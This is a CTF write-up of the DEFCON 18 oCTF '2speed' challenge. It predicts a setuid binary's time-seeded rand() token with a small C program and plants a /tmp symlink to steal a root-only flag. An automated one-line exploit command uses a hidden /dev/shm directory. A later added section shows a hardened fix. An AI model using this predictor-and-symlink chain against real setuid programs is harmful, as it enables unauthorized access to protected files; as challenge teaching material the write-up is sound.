# TubeWarriors DEFCON 18 oCTF "2speed" challenge
## Challenge description and overview of solution
A complete write-up on the 2speed challenge's local root vulnerability exploitation is documented in [DC18-oCTF-2speed-local-root](/DC18-oCTF-2speed-local-root).
The **2speed** (setuid root) binary generates a random value seeded by the current time and then compares that value (hex-encoded) to the first command line argument provided when the binary is run. If they match, it copies the first 33 bytes of a file called **flag.txt** in the current directory (in particular, **/home/2speed/flag.txt**, which contained the challenge's flag data and was owned by root with no group/world permissions) into a file in **/tmp** whose name is constructed from the same time-seeded rand() output. By running the **2speed** binary with the proper argument, one can then immediately read the flag contents from the generated file in /tmp/.
### Investigative steps
**ltrace** was used to investigate 2speed's behavior. Example output follows:
```
jvoss@ASLinLt40:dc18 $ltrace ./2speed 1234
__libc_start_main(0x8048574, 2, 0xff8b85f4, 0x8048740, 0x8048730 <unfinished ...>
time(NULL) = 1280700730
srand(0x4c55f13a, 1, 2181, 0xf776b7a8, 0x76b4c8) = 0
rand(0x76b4c8, 0, 0, 0, 0) = 0x18efae73
sprintf("18efae73", "%08x", 0x18efae73) = 8
strcmp("18efae73", "1234") = 1
+++ exited (status 0) +++
```
From this output it was possible to deduce that the program is essentially doing:
```c
time_t i = time(NULL);
srand(i);
int ra = rand();
printf("%08x\n", ra);
```
### Solution
A simple C program was created which outputs this time-seeded random value as a hex-encoded string. It could then be used as follows to satisfy the challenge application:
```
./2speed $(./2speeder )
```
Below is the *2speeder* C program; it is quite simple:
```c
#include <stdio.h>   /* printf */
#include <stdlib.h>  /* srand, rand */
#include <time.h>    /* time */

int main(int argc, char **argv)
{
    /* Seed exactly as 2speed does (ltrace showed srand(time(NULL))) ... */
    time_t cur_time = time(NULL);
    srand(cur_time);
    /* ... so the first rand() value matches 2speed's when run in the same second. */
    int ra = rand();
    printf("%08x\n", ra);
    return 0;
}
```
At that point we were able to grab 2speed's flag using a simple symlink attack. Our random-number-generating binary was placed in **/dev/shm/..../2speeder**.
### Solution automation
This solution could be automated in the following fashion, and executed remotely if desired.
```
export ourkey=$(/dev/shm/..../2speeder); ln -s /dev/shm/..../ok2.txt /tmp/flag.tmp.$ourkey; /home/twospeed/2speed $ourkey; cat /dev/shm/..../ok2.txt
```
This reliably produced the key contents in **/dev/shm/..../ok2.txt**.
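The two weaknesses this write-up exploits are a time-seeded rand() and a setuid program that writes the flag to a guessable /tmp path without checking what already occupies that name. The following is an added example, not part of the original write-up or of the challenge binary, showing how the binary could have avoided both: the token comes from the kernel CSPRNG, and the output file is opened with O_CREAT|O_EXCL|O_NOFOLLOW so a pre-planted symlink makes the open fail instead of redirecting the write. The /tmp/flag.tmp.<hex> naming is taken from the automation above; /dev/urandom is used for portability (getrandom(2) is the Linux-native equivalent).

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Draw a 32-bit token from the kernel CSPRNG instead of srand(time(NULL)),
 * whose output anyone on the box can reproduce. Returns 0 on success. */
int secure_token(unsigned int *out)
{
    int fd = open("/dev/urandom", O_RDONLY | O_CLOEXEC);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, out, sizeof *out);
    close(fd);
    return n == (ssize_t)sizeof *out ? 0 : -1;
}

/* Create the output file only if nothing is already at that name.
 * O_EXCL makes open() fail with EEXIST when the path exists, including a
 * pre-planted symlink; O_NOFOLLOW additionally refuses to follow a symlink
 * at the final component (ELOOP). Mode 0600 keeps the copied flag private.
 * Returns the fd, or -1 with errno set; the caller must not "fall back". */
int create_private_file(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Stand-alone demo: build the 2speed-style path and create it safely. */
int main(void)
{
    unsigned int tok;
    char path[64];
    if (secure_token(&tok) != 0)
        return 1;
    snprintf(path, sizeof path, "/tmp/flag.tmp.%08x", tok);
    int fd = create_private_file(path);
    if (fd < 0) {
        perror(path); /* EEXIST/ELOOP: someone planted that name; abort */
        return 1;
    }
    printf("created %s\n", path);
    close(fd);
    unlink(path);
    return 0;
}
```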
----
CategoryWhitepapers